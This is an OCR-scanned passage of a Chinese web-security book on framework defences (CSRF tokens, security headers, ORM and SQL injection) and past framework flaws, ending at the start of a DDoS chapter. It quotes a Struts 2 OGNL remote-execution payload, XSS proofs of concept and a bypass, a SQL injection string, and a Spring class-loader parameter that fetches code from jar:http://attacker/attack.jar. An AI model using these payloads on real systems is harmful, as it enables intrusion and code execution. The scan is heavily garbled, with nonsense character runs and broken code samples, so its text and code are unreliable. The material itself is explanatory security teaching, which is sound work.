所 有 form 和 由 Rails 生 成 的 Ajax 请 求 中 。 通 过 框架 实现 的 这 一 功能 大 大 
简化 了 程序 员 的 开发 工作 。 
在 Django 中 也 有 类 似 的 功能 ， 但 是 配置 稍微 要 复杂 点 。 


首先 ， 将 django.middleware.csrf.Csr-fViewMiddlewar 7 加 到 
MIDDLEWARE _ CLASSES 中 。 


('django.middleware.common.CommonMiddleware', 
'django.contrib.sessions.middleware.SessionM 
iddleware', 
'django.middleware.csrf.CsrfViewMiddlewar 
e', 
'django.contrib.auth.middleware.Authenticati 
onMiddleware', 
'django.contrib.messages.middleware.MessageM 
iddleware',) 


然后 ， 在 form 表 单 的 模板 中 添加 token。 


«form action="." method="post">{% csrf_token 
%} 


fe 下来， 确认 在 View Jm BU ER XX + HR HOT 
django.core.context processors.csrf, W RE H HY x RequestContext, Jl! 


PU CARAT, dms SEP AI ° 


from django.core.context_processors import 
csrf 
from django.shortcuts import 
render to response 
def my view(request): 

c= 


c.update(csrf (request) ) 
# ... view code here 
return 
render to response("a template.html", c) 


这 样 束 配置 成 功 了 ， 可 以 享受 CSRF 防 御 的 效果 了 。 

在 Ajax 请 求 中 ， 一 般 是 插入 一 个 包含 了 token 的 HITP 头 ， 使 用 HTTP 头 
是 为 了 防止 token 泄 密 ， 因 为 一 般 的 JavaScript 无 法 获取 到 HTTP 头 的 信 
息 ， 但 是 在 存在 一 些 跨 域 漏洞 时 可 能 会 出 现 例外 。 

下 面 古 一 个 在 Ajax 中 添加 上 自 定 义 token 的 例子 。 


$(document).ajaxSend(function(event, xhr 
settings) { 
function getCookie(name) { 
var cookieValue = null; 
if (document.cookie && 
document.cookie !- '') { 
var cookies - 
document.cookie.split(';'); 
for (var i = 0; i< 
cookies.length; i++) { 
document .location.protocol; 
var sr_origin = '//' + host; 
var origin = protocol + sr_origin; 
// Allow absolute or scheme relative 
URLs to same origin 
return (url == origin || 
url.slice(0, origin.length + 1) == origin + 
y) 


(url -- sr origin || 
url.slice(0, sr origin.length + 1) -- 
sr origin * '/') || 

// or any other URL that isn't 
scheme relative or absolute i.e relative. 

(/^(N/NM |http: | 
https:).*/.test(ur1)); 


} 
function safeMethod(method) { 
return (/A(GET|HEAD| OPTIONS | 
TRACE)$/.test (method) ); 


} 
if (!safeMethod(settings.type) && 
sameOrigin(settings.url)) { 
xhr.setRequestHeader ("X-CSRFToken", 
getCookie('csrftoken')); 
} 


D 


在 Spring MVC 以 及 一 些 其 他 的 流行 Web 框 架 中 ， 并 没有 直接 提供 针对 
CSRF 的 保护 ， 因 此 这 些 功 能 需要 自己 实现 。 


12.4 HTTP Headers 3t 

在 Web 框 架 中 ， 可 以 对 HTTP 头 进行 全 局 化 的 处 理 ， 因 此 一 些 基 于 
HTTP 头 的 安全 方案 可 以 很 好 地 实施 。 

比如 针对 HTITP 返 回头 的 CRLE 注 入 (攻击 原理 细节 请 参考 “注入 攻 
击 ” 一 章 ) ， 因 为 HTTP 头 实际 上 可 以 看 成 是 key-value 对 ， 比 如 : 


Location: http://www.a.com 
Host: 127.0.0.1 


因此 对 抗 CRELE 的 方案 只 需要 在 “value” 中 编码 所 有 的 \n 即 可 。 这 里 没 
有 提 到 在 “key” 中 编码 Wn， 是 因为 让 用 户 能 够 控制 “key” 是 极其 危险 的 
事情 ， 在 任何 情况 下 都 不 应 该 使 其 发 生 。 

类 似 的 ， 针 对 30X 返 回 号 的 HITP Response, X w ar A e k ER FI 
Location 指 定 的 URL， 攻 击 者 往往 利用 此 类 功能 实施 钓鱼 或 诈骗 。 


HTTP/1.1 302 Moved Temporarily 
( 


Location: http://www.phishing.tld 


因此 ， 对 于 框架 来 说 ， 管 理 好 跳 转 目的 地 址 是 很 有 必要 的 。 一 般 来 
说 ， 可 以 在 两 个 地 方 做 这 件 事 情 : 

(1) 如 果 Web 框 架 提供 统一 的 跳 转 画 数 ， 则 可 以 在 跳 转 画 数 内 部 实现 
一 个 日 名 单 ， 指 定 跳 转 地 址 只 能 在 日 名 单 中 

(2) 另 一 种 解决 方式 是 控制 HTITP 的 Location 字 段 ， 限 制 Location 的 值 
只 能 是 哪些 地 址 ， 也 能 起 到 同样 的 效果 ， 其 本 质 还 是 日 名 单 。 
有 很 多 与 安全 相关 的 Headers， 也 可 以 统一 在 Web 框 架 中 配置 。 比 如 用 
来 对 抗 ClickJacking 的 X-Frame-Options， 需 要 在 页 面 的 HTTP Response 
FE SIT: 
Web 框 架 可 以 封装 此 功能 ， 并 提供 页 面 配 置 。 该 HTTP 头 有 三 个 可 选 的 
值 : SAMEORIGIN ` DENY ` ALLOW-FROM origin， 适 用 于 各 种 不 同 
的 场景 。 
在 前 面 的 章节 中 ， 还 曾 提 到 Cookie 的 HttpOnly Flag, € fE E URI bt as 
不 要 让 JavaScript 访 问 该 Cookie， 在 Session 劫 持 等 问题 上 有 着 积极 的 意 
义 ， 而 且 成 本 非常 小 。 
但 并 不 是 所 有 的 web 服务器 、Web 容 右 、 脚 本 语言 提供 的 API 都 文 持 设 
置 HttpOnly Cookie， 所 以 很 多 时 候 需 要 由 框架 实现 一 个 功能 ， 对 所 有 
EE GROUPS 不 需要 此 功能 的 Cookie 则 单独 在 配置 文 

列 出 。 


pORGEdE RATA Aft. EWER P KA E Riu TS FED 
会 有 遗漏 。 束 HttpOnlyCookie 来 说 ， 它 要求 在 所 有 服务 器 端 设 置 该 
Cookie 的 地 方 都 必须 加 上 ， 这 可 能 意味 着 很 多 不 同 的 业务 和 页 面 ， 只 
要 一 个 地 方 有 遗漏 ， 整 会 成 为 短 板 。 当 网 站 的 业务 复杂 时 ， 登 录入 口 
可 能 承 有 数 十 个 ， 兼 顾 所 有 Set-Cookie 页 面 会 非常 麻烦 ， 因 此 在 框架 中 
解决 将 成 为 最 好 的 方案 。 

一 般 来 说 ， 和 框架 会 提供 一 个 统一 的 设置 Cookie 函 数 ，HttpOnly 的 功能 
可 以 在 此 函数 中 实现 ， 如 果 没 有 这 样 的 钞 数 ， 则 需要 统一 在 HTTP 返 回 
头 中 配置 实现 。 


12.5 ”数据 持久 层 与 QL 注入 

使 用 ORM (Object/Relation Mapping) 框架 对 SQL 注入 是 有 积极 意义 
的 。 我 们 知道 对 抗 $SQL 注 入 的 最 佳 方式 就 是 使 用 " 预 编译 绑 定 变量 ”。 
在 实际 解决 SQL 注入 时 ， 还 有 一 个 难点 就 是 应 用 复杂 后 ， 代 码 数量 庞 
大 ， 难 以 把 可 能 存在 SQL 注入 的 地 方 不 遗漏 地 找 出 来 ， 而 ORM 框 架 为 
我 们 发 现 问题 提供 了 一 个 便捷 的 途径 。 

以 ORM 框 架 ibatis 举 例 ， 它 是 基于 sqlmap 的 ， 生 成 的 SQL 语句 都 结构 化 
地 写 在 XML 文件 中 。ibatis 支 持 动态 SQL， 可 以 在 SQL 语句 中 插入 动态 
如 果 用 户 能 够 控制 这 个 变量 ， 则 会 存在 一 个 SQL 注入 
漏洞。 


ass="cn. > $ : 
select TABLE NAME, TABLESPACE NAME from 
es where table name like '%'|| 


user tal 
stable | 
namez | | '%' 

order by $orderByColumn$  $orderByType$ 
</select> 


而 静态 变量 #value# 则 是 安全 的 ， 因 此 在 使 用 ibatis 时 ， 只 需要 搜索 所 有 
的 sqglmap 文 件 中 是 否 包 含 动态 变量 即 可 。 当 业务 需要 使 用 动态 SQL 
上 时， 可 以 作为 特例 处 理 ， 比 如 在 上 层 的 代码 逻辑 中 针对 该 变量 进行 严 
格 的 控制 ， 以 保证 不 会 发 生 注入 问题 。 

而 在 Django 中 ， 做 法 则 更 简单 ，Django 提 供 的 Database API， 默 认 已 经 
将 所 有 输入 进行 了 SQL 转 义 ， 比 如 : 


foo.get_list(bar__exact="' OR 1-1") 


其 最 终 效果 类 似 于 : 


SELECT * FROM foos WHERE bar = '\' OR 1=1' 


使 用 Web 框 架 提 供 的 功能 ， 在 代码 风格 上 更 加 统一 ， 也 更 利于 代码 审 


Wr 


12.6 ”还 能 想到 什么 

除了 上 面 讲 到 的 几 点 外 ， 在 框架 中 还 能 实现 什么 安全 方案 呢 ? 

其 实 选 择 是 很 多 的 ， 凡 是 在 Web 框 架 中 可 能 实现 的 安全 方案 ， 只 要 对 
性 能 没有 太 大 的 损耗 ， 都 应 该 考虑 实施 。 

比如 文件 上 传 功能 ， 如 果 应 用 实现 有 问题 ， 可 能 束 会 成 为 严重 的 漏 
洞 。 若 是 由 每 个 业务 单独 实现 文件 上 传 功能 ， 其 设计 和 代码 都 会 存在 
差异 ， 复 杂 情 况 也 会 导致 安全 问题 难以 控制 。 但 如 果 在 Web 框 架 中 能 
为 文件 上 传 功能 提供 一 个 足够 安全 的 二 方 库 或 者 函数 (具体 可 参考 “ 文 
件 上 传 漏洞 ”一 章 ) ， 就 可 以 为 业务 线 的 开发 者 解决 很 多 问题 ， 让 程序 
员 可 以 把 精力 和 重点 放 在 功能 实现 上 。 

Spring Security} Spring MVC 的 用 户 提 供 了 许多 安全 功能 ， 比 如 基于 
URL 的 访问 控制 、 加 密 方 法 、 证 书 支 持 、OpenID 支 持 等 。 但 Spring 
Secu-rity 尚 缺乏 诸如 XSS、CSRF 等 问题 的 解决 方案 。 

在 设计 整体 安全 方案 时 ， 比 较 科 学 的 方法 是 按照 本 书 第 1 章 中 所 列举 的 
过 程 来 进行 一 一 首先 建立 威胁 模型 ， 然 后 再 判断 哪些 威胁 是 可 以 在 框 
架 中 得 到 解决 的 。 

在 设计 Web 框 染 安 全 解决 方案 时 ， 还 需要 保存 好 安全 检查 的 日 志 。 在 
设计 安全 逻辑 时 也 需要 考虑 到 日 志 的 记录 ， 比 如 发 生 XSS 攻 击 时 ， 可 
以 记录 下 攻击 者 的 了 PP、 时 间 、UserAgent、 目 标 URL、 用 户 名 等 信息 。 
这 些 日 志 ， 对 于 后 期 建立 攻击 事件 分 析 、 入 侵 分 析 都 是 有 积极 意义 
的 。 当 然 ， 开 启 日 志 也 会 造成 一 定 的 性 能 损失 ， 因 此 在 设计 时 ， 需 要 
考 虚 日 志 记 录 行 为 的 频繁 程度 ， 并 尺 可 能 避免 误 报 。 

在 设计 Web 框 架 安 全 时 ， 还 需要 与 时 俱 进 。 当 新 的 威胁 出 现时 ， 应 当 
及 时 完成 对 应 的 防御 方案 ， 如 此 一 个 Web 框 架 才 具有 生命 力 。 而 一 些 
0day 漏 洞 ， 也 有 可 能 通过 “虚拟 补丁 ”的 方式 在 框架 层面 解决 ， 因 为 
Web 框 架 就 像 是 一 层 外 衣 ， 为 Web 应 用 提供 了 足够 的 保护 和 控制 力 。 


12.7 “Web 框架 自身 安全 

前 面 几 节 讲 的 都 是 在 Web 框 架 中 实现 安全 方案 ， 但 Web 框 架 本 身 也 可 能 

会 出 现 漏 洞 ， 只 要 是 程序 ， 就 可 能 出 现 bug。 但 是 开发 框架 由 于 其 本 续 

的 特殊 性 ， 一 般 网 站 出 于 稳定 的 考虑 不 会 对 这 个 基础 设施 频繁 升级 ， 

因此 开发 框架 的 漏洞 可 能 不 会 得 到 及 时 的 修补 ， 但 由 此 引发 的 后 采 却 

会 很 严重 。 

下 面 讲 到 的 几 个 漏洞 ， 都 是 一 些 流行 的 Web 开 发 框架 曾经 出 现 过 的 严重 

漏洞 。 研 究 这 些 案 例 ， 可 以 帮助 我 们 更 好 地 理解 框架 安全 ， 在 使 用 开 

发 框架 时 更 加 的 小 心 ， 同 时 让 我 们 不 要 迷信 于 开发 框 染 的 权威 。 

12.71 Struts 2 命令 执行 漏洞 

2010 年 7 月 9 日 ， 安 全 研究 者 公布 了 Struts 2 一 个 远程 执行 代码 的 漏洞 
(CVE-2010-1870) ， 严 格 来 说 ， 这 其 实 是 XWork 的 漏洞 ， 因 为 Struts 2 

中 核心 使 用 的 是 WebWork， 而 WebWork 又 是 使 用 XWork 来 处 理 action 

这 个 漏洞 的 细节 摘 述 公 布 在 exploit-db 上 。 

在 这 里 简单 摘 述 如 下 : 

XWork 通 过 getters/setters 方 法 从 HTTP 的 参数 中 获取 对 应 action 的 名 称 ， 

这 个 过 程 是 基于 OGNL(Object Graph Navigation Language) 的 。OGNL 是 

怎么 处 理 的 呢 ? 如 下 : 


user.address.city-Bishkek&user['favoriteDrink 
']=kumys 


Zy7 ^ 

会 被 转化 成 : 
action.getUser().getAddress().setCity("Bishkek") 
action.getUser().setFavoriteDrink("kumys") 


这 个 过 程 是 由 ParametersInterceptor 调 用 ValueStack.setValue0) 完 成 的 ， 它 
的 参数 是 用 户 可 探 的 ， 由 HTTP 参 数 传 入 。OGNL 的 功能 较为 强大 ， 远 
程 执 行 代 码 也 正 是 利用 了 它 的 功能 。 


* Method calling: foo() 

* Static method calling: 
@java.lang.System@exit (1) 

* ructor calling: new MyClass() 

to work with context variables: 
MyClass( 


由 于 参数 完全 是 用 户 可 控 的 ， 所 以 XWork 出 于 安全 的 目的 ， 增 加 了 两 
个 方法 用 以 阻止 代码 执行 。 


* OgnlContext's property 
'xwork.MethodAccessor.denyMethodExecution' ( 


erAccess private field called 
'allowStaticMethodAccess' ( 缺 省 为 false) 


但 这 两 个 方法 可 以 被 覆盖 ， 从 而 导致 代码 执行 。 


#_memberAccess['allowStaticMethodAccess'] = 
true 

#foo = new java .lang.Boolean("false") 
#context[ 'xwork.MethodAccessor .denyMethodExec 
ution'] = #foo 

#rt = @java.lang.Runtime@getRuntime() 
4rt.exec('mkdir /tmp/PWNED' ) 


ParametersInterceptor 古 不 允许 参数 名 称 中 有 # 的 ， 因 为 OGNL 中 的 许多 
预定 义 变量 也 是 以 # 表 示 的 。 


* #context - OgnlContext, the one guarding 
method execution based on 
'xwork.MethodAccessor. 
denyMethodExecution' property value. 

* & memberAccess - SecurityMemberAccess, 
whose 'allowStaticAccess' field prevented 
static 

method execution. 

* #root 

* #this 

* # typeResolver 

* # classResolver 

* # traceEvaluations 

* # lastEvaluation 

* & keepLastEvaluation 


可 是 攻击 者 在 过 去 找到 了 这 样 的 方法 (bug 编 号 XW-641) : 使 用 \u0023 
来 代 苦 #， 这 是 # 的 十 六 进 制 编码 ， 从 而 构造 出 可 以 远程 执行 的 攻击 pay- 
load ° 


http://mydomain/MyStruts.action? 
('\u0023_memberAccess[\'allowStaticMethodAcce 
ss\']')( 

meh)=true&(aaa) 

( ('\u0023context[\'xwork .MethodAccessor .den 
yMethodExecution\' ]\u003d\u0023f00' ) 
(\u0023f00\uU003dnew 
%20java.lang.Boolean("false")) 
)&(asdf)(('Nu8023rt.exit(1)')(Nuoe23rt 
\u003d@java.lang.Runtime@getRunti 

me()))-1 


最 终 导致 代码 执行 成 功 。 
12.7.2 Struts 2 的 问题 补丁 


Struts 2 官方 目前 公布 了 几 个 安全 补丁 : 


Dache Struts 2 Documentation > Home > Security Bulletins 


Apache Struts 2 Documentation 


Security Bulletins 


The following security bulletins are available: 


S2-001 — Remote code exploit on form validation error 

S2-002 — Cross site scripting (XSS) vulnerability on «s:url» and «s:a» tags 

S2-003 一 XWork ParameterInterceptors bypass allows OGNL statement execution 
S2-004 — Directory traversal vulnerability while serving static content 

S2-005 一 XWork ParameterInterceptors bypass allows remote command execution 
S2-006 — Multiple Cross-Site Scripting (XSS) in XWork generated error pages 

S2-007 — User input is evaluated as an OGNL expression when there's a conversion error 
S2-008 — Multiple critical vulnerabilities in Struts2 


Children Show Children 


Struts 2 官方 的 补丁 页 面 

但 深入 其 细节 不 难 发 现 ， 补 丁 提交 者 对 于 安全 的 理解 是 非常 粗浅 的 。 
以 S2-002 的 漏洞 修补 为 例 ， 这 是 一 个 XSS 漏 洞 ， 发 现 者 当时 提交 给 官方 
的 POC 只 是 构造 了 script 标 签 。 


http://localhost/foo/bar.action? 
<script>alert(1)</script>test=hello 


我 们 看 看 当时 官方 是 如 何 修补 的 : 


Dache Struts 2 Documentation > Home > Security Bulletins 


Apache Struts 2 Documentation 


Security Bulletins 


The following security bulletins are available: 


S2-001 — Remote code exploit on form validation error 

S2-002 — Cross site scripting (XSS) vulnerability on <s:url> and <s:a> tags 

52-003 一 XWork ParameterInterceptors bypass allows OGNL statement execution 

— Directory traversal vulnerability while serving static content 

S2-005 一 XWork ParameterInterceptors bypass allows remote command execution 
S2-006 — Multiple Cross-Site Scripting (XSS) in XWork generated error pages 

S2-007 — User input is evaluated as an OGNL expression when there's a conversion error 
52-008 — Multiple critical vulnerabilities in Struts2 


s. 9997999 
un 
ne 
[=] 
© 
$ 


Children Show Children 


新 增 的 修补 代码 : 


可 以 看 到 ， 只 是 简单 地 替换 掉 <script> 标 签 。 

于 是 有 人 发 现 ， 如 果 构 造 <<script>>， 经 过 一 次 处 理 后 会 变 为 <script>。 
漏洞 报告 给 官方 后 ， 开 发 者 再 次 提交 了 一 个 补丁 ， 这 次 将 递归 处 理 类 
似 <<<<script>>>> 的 情况 。 


. revision 614314, Thu Jan 24 07:39:45 2008 UTC = 515103, Fri Jan 25 03:50:48 2008 UTC 
'6 public class UrlHelpe: Line 176 public class UrlHelp 
111 String result = link. toString() ; String result = link. toString (); 
ug 
113 
180 result = result. replaceAll ("<seript>”, “seript’); result = reault.replaceAll ("<script>”, “script’); 
181 ] l 
[e T V) 
122 try Í try Í 
123 result = encodeRemilt ? response. encodelKI (result) : result; result = encodeRemult ? response, encodelRl. (result) * result; 
184 ] catch (Exception ex) [ ] catch (Exception ex) [ 


修补 代码 仅仅 是 将 寺 变 成 while: 


result © result, replaceAll(4geript?', "script"): 


A UI 仍然 是 存在 问题 的 ， 攻 击 者 可 以 通过 下 面 的 方法 
ry ee 


http://localhost/foo/bar.action?<script 
test=hello>alert(1)</script> 


由 此 可 见 ，Struts 2 的 开发 者 ， 本 身 对 于 安全 的 理解 是 非常 不 到 位 的 。 
关于 如 何 正 确 地 防御 XSS 漏 洞 ， 请 参考 本 书 的 “ 跨 站 脚本 攻击 ”一 章 。 
12.7.3 Spring MVC 命 令 执 行 漏洞 

2010 年 6 月 ， 公 布 了 Spring 框架 一 个 远程 执行 命令 漏洞 ，CVE 编 号 是 
CVE-2010-1622。 漏 洞 影响 范围 如 下 : 


SpringSource Spring Framework 3.0.0~3.0.2 
SpringSource Spring Framework 2.5.0~2.5.7 


由 于 Spring 框架 允许 使 用 客户 端 所 提供 的 数据 来 更 新 对 象 必 性， 而 这 一 
机 制 允许 攻击 者 修改 class.classloader 加 载 对 象 的 类 加 载 器 的 属性 ， 这 可 
能 导致 执行 任意 命令 。 例 如 ， 攻 击 者 可 以 将 类 加 载 帮 所 使 用 的 UREL 修 
改 到 受 探 的 位 置 。 

(1) 创建 attack.jar 并 可 通过 HTTP URL 使 用 。 这 个 jar 必 须 包 含 以 下 内 
Z: ?META-INF/spring-form.ttd， 定 义 Spring 表 单 标签 并 指定 实现 为 标 
?META-INF/tags/ 中 的 标签 文件 ， 包 含 标 签 定义 ( 任 
意 Java 代 码 ) ° 

(2) 通过 以 下 HTTP 参 数 向 表单 控制 器 提交 HTTP 请 求 : 


class.classLoader.URLs[0]=jar:http://attacker 
/attack.jar!/ 


iUm E HUE A URL 78 3: WebappClass-Loader HJ repository URLs jS TE 
的 第 0 个 元 素 。 (3) 之 后 org.apache.jasper.compiler.TldLo- 
cationsCache.scanJars() 会 使 用 WebappClass-Loader 的 URL 解 析 标 签 库 ， 
会 对 TLD 中 所 指定 的 所 有 标签 文件 解析 攻击 者 所 控制 的 jar 9 

这 个 漏洞 将 直接 危害 到 使 用 Spring MVC 框 架 的 网 站 ， 而 大 多 数 程序 员 
可 能 并 不 会 注意 到 这 个 问题 。 

12.7.4 Django 命令 执行 漏洞 

在 Django 0.95 版 本 中 ， 也 出 现 了 一 个 远程 执行 命令 漏洞 ， 根 据 官 方 代 
码 diff 后 的 细节 ， 可 以 看 到 这 是 一 个 很 明显 的 “命令 和 注入” 漏洞， 我们 
在 “注入 攻击 ”一 章 中 ， 曾 经 描述 过 这 种 漏洞。 

Django 在 处 理 消息 文件 时 存在 问题 ， 远 程 攻 击 者 构建 恶意 .po 文件 ， 诱 
使 用 户 访问 处 理 ， 可 导致 以 应 用 程序 进程 权限 执行 任意 命令 。 


django/trunk/django/bin/compile-messages.py 
r3590 r3592 
20 20 sys.stderr.write( "processing file %s in *sin' % (f, dirpath)) 
21 21 pf = os.path.splitext(os.path.join(dirpath, f))[0] 
22 cmd = 'msgfmt -o "%s.mo" "%s.po"' % (pf, pf) 
# Store the names of the .mo and .po files in an environment 
# variable, rather than doing a string replacement into the 
# command, so that we can take advantage of shell quoting, to 
# quote any malicious characters/escaping. 
# See http://cyberelk.net/tim/articles/cmdline/ar01502.html 


os.environ['djangocompilemo'] = pf + '.mo 


os.environ['djangocompilepo'] = pf + '.po 
$djangocompilepo"' 


cmd - 'msgfmt -o "Sdjangocompilemo 
23 3ü os.system( cmd) 
24 31 


Django 的 漏洞 代码 
漏洞 代码 如 下 ; 


cmd = 'msgfmt -o "%s.mo" "%s.po"' % (pf, pf) 
os.system(cmd) 


这 是 一 个 典型 的 命令 注入 漏洞 。 但 这 个 漏洞 从 利用 上 来 说 ， 意 义 不 是 
特别 大 ， 它 的 教育 意义 更 为 重要 。 


12.8 小结 

在 本 章 中 讲述 了 一 些 Web 框 架 中 可 以 实施 的 安全 方案 。Web 框 架 本 身 
也 是 应 用 程序 的 一 个 组 成 部 分 ， 只 是 这 个 组 成 部 分 较为 特殊 ， 处 于 基 
础 和 底层 的 位 置 。Web 框 架 为 安全 方案 的 设计 提供 了 很 多 便利 ， 好 好 
利用 它 的 强大 功能 ， 能 够 设计 出 非常 优美 的 安全 方案 。 

但 我 们 也 不 能 迷信 于 Web 框 架 本 喘 。 很 多 Web 框 架 提 供 的 安全 解决 方 
案 有 时 并 不 可 靠 ， 我 们 仍然 需要 自己 实现 一 个 更 好 的 方案 。 同 时 Web 
Pd CTUM 作为 一 个 基础 服务 ， 一 旦 出 现 漏 洞 ， 
影响 是 J o 
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在 互联 网 中 一 谈 起 DDOS 攻 击 ， 人 们 往往 谈 席 色 变 。DDOS 攻 击 被 认为 
是 安全 领域 中 最 难 解决 的 问题 之 一 ， 迄 今 为 止 也 没有 一 个 完美 的 解决 
方案 。 在 本 章 中 将 主要 针对 Web 安 全 中 的 “应 用 层 拒绝 服务 攻击 ”来 展 
开 讨 论 ， 并 根据 笔者 这 些 年 的 一 些 经 验 总 结 ， 探 讨 此 问题 的 解决 之 


道 


131 DDOS 简 介 

DDOS 又 称 为 分 布 式 拒绝 服务 ， 全 称 是 Dis-tributed Denial of Service ° 
DDOS 本 是 利用 合理 的 请 求 造成 资源 过 载 ， 导 致 服务 不 可 用 。 比 如 一 个 
停车 场 总 共有 100 个 车 位 ， 当 100 个 车 位 都 停 满 车 后 ， 再 有 车 想 要 停 进 
来 ， 就 必须 等 已 有 的 车 先 出 去 才 行 。 如 果 已 有 的 车 一 直 不 出 去 ， 那 么 
FEBA OREHEK, FENER, MRES LIET, 
这 种 情况 就 是 “拒绝 服务 ”。 

我 们 的 系统 就 好 比 是 停车 场 ， 系 统 中 的 资源 就 是 车 位 。 资 源 是 有 限 
的 ， 而 服务 必须 一 直 提 供 下 去 。 如 果 资 源 都 已 经 被 占用 了 ， 那 么 服务 
也 将 过 载 ， 导 致 系统 停止 新 的 响应 © 

分 布 式 拒绝 服务 攻击 ， 将 正常 请 求 放大 了 若干 倍 ， 通 过 若干 个 网 络 节 
点 同时 发 起 攻击 ， 以 达成 规模 效应 。 这 些 网 络 方 点 往往 是 黑客 们 所 控 
制 的 “肉鸡 ”， 数 量 达 到 一 定 规模 后 ， 就 形成 了 一 个 “僵尸 网 络 ”。 大 型 的 
僵尸 网 络 ， 甚 至 达到 了 数 万 、 数 十 万 台 的 规模 。 如 此 规模 的 僵尸 网 络 
发 起 的 DDOS 攻 击 ， 几 乎 是 不 可 阻挡 的 。 

常见 的 DDOS 攻 击 有 SYN flood ` UDP flood ` ICMP flood 等 。 其 中 SYN 
flood 是 一 种 最 为 经 典 的 DDOS 攻 击 ， 其 发 现 于 1996 年 ， 但 至 今 仍 然 保持 
着 非常 强大 的 生命 力 。SYN flood 如 此 独 锋 是 因为 它 利 用 了 TCP 协 议 设 
计 中 的 缺陷， 而 TCP/P 协 议 是 整个 互联 网 的 基础 ， 牵 一 发 而 动 全 身 ， 
如 今 想 要 修复 这 样 的 缺陷 几乎 成 为 不 可 能 的 事情 。 


y 7 QU CU 
级 外 (si 
三 应 用 服务 器 


DDOS 攻 击 示 意图 
在 正常 情况 下 ，TCP 三 次 握手 过 程 如 下 : 


(1) 客户 端 向 服务 器 端 发 送 一 个 SYN 包 ， 包 含 客户 端 使 用 的 端口 号 和 
初始 序列 号 x; 

(2) 服务 器 端 收 到 客户 端 发 送 来 的 SYN 包 后 ， 向 客户 端 发 送 一 个 SYN 
和 ACK 都 置 位 的 TCP 报 文 ， 包 含 确认 号 xx1 和 服务 器 端的 初始 序列 号 


y: 
(3) 客户 端 收 到 服务 器 端 返回 的 SYNSACK 报 文 后 ， 向 服务 器 端 返 回 
m Li ` 序号 为 xx1 的 ACK 报 文 ， 一 个 标准 的 TCP 连 接 完 


而 SYN flood 在 攻击 时 ， 首 先 伪造 大 量 的 源 IP 地 址 ， 分 别 同 服务 器 端 发 
送 大 量 的 SYN 包 ， 此 时 服务 絮 端 会 返回 SYN/ACK 包 ， 因 为 源 地 址 是 伪 
造 的 ， 所 以 伪造 的 IP 并 不 会 应 答 ， 服 务 器 端 没 有 收 到 伪造 IP 的 回应 ， 会 
重 试 3 一 5 次 并 且 等 待 一 个 SYNTime (一 般 为 30 秒 至 2 分 钟 ) ， 如 果 超 时 
则 丢弃 这 个 连接 。 攻 击 者 大 量 发 送 这 种 伪造 源 地 址 的 SYN 请 求 ， 服 务 
器 端 将 会 消耗 非常 多 的 资源 (CPU 和 内 存 ) 来 处 理 这 种 半 连 接 ， 同 时 
还 要 不 断 地 对 这 些 IP 进 行 SYN+ACK 重 试 。 最 后 的 结果 是 服务 器 无 暇 理 
皮 正 常 的 连接 请 求 ， 导 致 拒绝 服务 。 

对 抗 SYN flood 的 主要 措施 有 SYN Cookie/SYN Proxy ^ safereset 等 
法 。SYN Cookie 的 主要 思想 是 为 每 一 个 IP 地 址 分 配 一 个 “Cookie”»， 并 统 
计 每 个 IP 地 址 的 访问 频率 。 如 果 在 短 时 间 内 收 到 大 量 的 来 自 同一 个 IP 地 
址 的 数据 包 ， 则 认为 受到 攻击 ， 之 后 来 自 这 个 IP 地 址 的 包 将 被 丢弃 。 
在 很 多 对 抗 DDOS 的 产品 中 ， 一 般 会 综合 使 用 各 种 算法 ， 结 合 一 些 
DDOS 攻 击 的 特征 ， 对 流量 进行 清洗 。 对 抗 DDOS 的 网 络 设备 可 以 串联 
或 者 并 联 在 网 络 出 口 处 。 

但 DDOS 仍 然 是 业界 的 一 个 难题 ， 当 攻击 流量 超过 了 网 络 设 备 ， 甚 至 带 
宽 的 最 大 负 丛 时 ， 网 络 仍 将 瘫痪 。 一 般 来 说 ， 大 型 网 站 之 所 以 看 起 来 
比较 能 “ 抗 ?DDOS 攻 击 ， 是 因为 大 型 网 站 的 带宽 比较 充足 ， 集 群 内 服务 
器 的 数量 也 比较 多 。 但 一 个 集群 的 资源 毕竟 是 有 限 的 ， 在 实际 的 攻击 
中 ，DDOoS 的 流量 甚至 可 以 达到 数 G 到 几 十 G， 遇 到 这 种 情况 ， 只 能 与 
网 络 运 营 疝 合作， 共同 完成 DDOS 攻 击 的 啊 应 。 

DDOS 的 攻击 与 防御 是 一 个 复杂 的 课题 ， 而 本 书 重点 是 Web 安 全 ， 因 此 
ME o LE CHAINE SAGE 有 兴趣 的 朋友 可 以 自行 查阅 


13.2 ”应 用 层 DDOS 

应 用 层 DDOS， 不 同 于 网 络 层 DDOS， 由 于 发 生 在 应 用 层 ， 因 此 TCP 三 
次 握手 已 经 完成 ， 连 接 已 经 建立 ， 所 以 发 起 攻击 的 IP 地 址 也 都 是 真实 
的 。 但 应 用 层 DDOS 有 时 其 至 比 网 络 层 DDOS 攻 击 更 为 可 怕 ， 因 为 今天 
几乎 所 有 的 商业 Anti-DDOS 设 备 ， 只 在 对 抗 网 络 层 DDOS 时 效果 较 好 ， 
而 对 应 用 层 DDOS 攻 击 却 缺 乏 有 效 的 对 抗 手段 。 

那么 应 用 层 DDOS 到 底 是 怎么 一 回 事 呢 ? 这 就 要 从 “CC 攻击 ?说 起 了 。 
13.2.1 CC 攻击 

“CC 攻击 ”的 前 身 是 一 个 叫 fatboy 的 攻击 程序 ， 当 时 墨客 为 了 挑战 绿 盟 的 
一 款 反 DDOS 设 备 开 发 了 它 。 绿 盟 是 中 国 著名 的 安全 公司 之 一 ， 它 有 一 
款 叫 “黑洞 (Collapasar) ”的 反 DDOS 设 备 ， 能 够 有 效 地 清洗 SYN Flood 
等 有 害 流 量 。 而 凌 客 则 挑 姓 式 地 将 fatboy 所 实现 的 攻击 方式 命名 为 : 
Chal-lenge Collapasar (简称 CC) ， 意 指 在 黑洞 的 防御 下 ， 仍 然 能 有 效 
完成 拒绝 服务 攻击 。 

CC 攻击 的 原理 非常 简单 ， 束 是 对 一 些 消耗 资源 较 大 的 应 用 页 面 不 断 发 
起 正常 的 请 求 ， 以 达到 消耗 服务 端 货 源 的 目的 。 在 Web 应 用 中 ， 碍 询 数 
据 库 、 读 / 写 人 硬盘 文件 等 操作 ， 相 对 都 会 消耗 比较 多 的 资源 。 在 百度 百 
科 中 有 一 个 很 典型 的 例子 : 应 用 层 常 见 SQL 代 码 范例 如 下 (以 PHP 为 
例 ) : $sql="select * from post where tagid-'$tagid' order by postid desc 
limit $start ,30";4 post AG EK, RDUM ER, $start F a eS AY , 
得 询 影响 结 末 集 =$start+30; 该 查询 效率 呈现 明显 下 降 趋 势 ， 而 多 并 发 频 
